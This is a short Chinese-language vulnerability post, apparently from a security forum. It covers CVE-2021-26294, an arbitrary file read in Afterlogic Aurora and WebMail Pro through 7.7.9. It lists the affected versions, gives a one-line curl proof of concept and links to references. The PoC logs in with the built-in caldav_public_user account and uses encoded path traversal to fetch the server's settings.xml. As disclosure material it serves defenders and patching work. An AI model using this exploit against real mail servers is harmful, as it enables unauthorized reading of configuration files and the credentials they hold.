Afterlogic Aurora & WebMail Pro 任意文件读取(CVE-2021-26294)

# Afterlogic Aurora & WebMail Pro 任意文件读取(CVE-2021-26294)

攻击者可以通过caldav_public_user@localhost用户登录,不需要其它用户信息就可以读取配置文件从而获得敏感信息。

影响版本:

* WebMail Pro ≤ 7.7.9
* Afterlogic Aurora ≤ 7.7.9

PoC:

“`bash
curl -u ‘caldav_public_user@localhost:caldav_public_user’ “https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml”
“`

ref:

* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26294
* https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md
* https://forum.ywhack.com/thread-115326-1-8.html

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容